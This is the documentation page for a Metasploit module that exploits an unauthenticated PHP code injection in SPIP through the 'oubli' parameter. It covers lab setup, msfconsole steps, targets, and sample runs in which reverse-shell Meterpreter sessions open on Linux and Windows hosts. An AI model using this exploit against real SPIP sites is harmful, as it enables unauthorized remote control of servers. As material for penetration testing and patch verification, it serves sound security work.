## Vulnerable Application

This module exploits a PHP code injection in SPIP. The vulnerability exists in
the `oubli` parameter and allows an unauthenticated user to execute arbitrary
commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.

The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
page and fingerprints it either via the `generator` meta tag, or by the
`Composed-By` header.

This module has been successfully tested against SPIP version 4.0.0.

## Setup

On Ubuntu 20.04, download a vulnerable instance of SPIP:

```
wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
```

Unzip it to a specific folder:

```
mkdir spip-site 
cp spip-v4.2.0.zip spip-site/ 
cd spip-site / 
unzip spip-v4.2.0.zip
```

Install php and the necessary extensions:

```
sudo apt install -y php-xml php-zip php-sqlite3
```

Serve the application (while in the newly created spip-site directory):

```
php -S 127.0.0.1:8000
```

Navigate to the following URL, select `sqlite` for the database, and complete the installation:

```
http://127.0.0.1:8000/ecrire/
```

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/multi/http/spip_rce_form`
3. Do: `set RHOSTS [IP]`
4. Do: `set LHOST [IP]`
5. Do: `exploit`

## Options

No options

## Targets

### 0 (PHP In-Memory)

This uses an in-memory PHP payload to execute code.

### 1 (Unix/Linux Command Shell)

This executes a Unix or Linux command.

### 2 (Windows Command Shell)

This executes a Windows command.

## Scenarios
### SPIP 4.2.0 - Linux target - PHP In-Memory
```
msf exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
[*] 127.0.0.1:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 192.168.1.36
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:36488) at 2024-08-22 15:01:39 +0200

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >
```

### SPIP 4.2.0 - Unix/Linux Command Shell

```
msf exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
[*] 127.0.0.1:8000 - Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:46044) at 2024-08-22 15:03:31 +0200

meterpreter > sysinfo 
Computer     : 192.168.1.36
OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### SPIP 4.2.0 - Windows Command Shell

```
msf exploit(multi/http/spip_rce_form) > run http://192.168.1.48

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: Z1kE0G5FLDrWkF9cvFp5ZuEKbtEjqIxoWTXL9HxYFP/xXeUohvYklG+kfLo32Cas24teZEJVX4e10CE5HEAjZ4HpM7VAUZoh
[*] 192.168.1.48:80 - Attempting to exploit...
[*] Sending stage (201798 bytes) to 192.168.1.48
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.48:50092) at 2024-08-22 14:59:16 +0200

meterpreter > sysinfo 
Computer        : DESKTOP-NHU31ET
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```
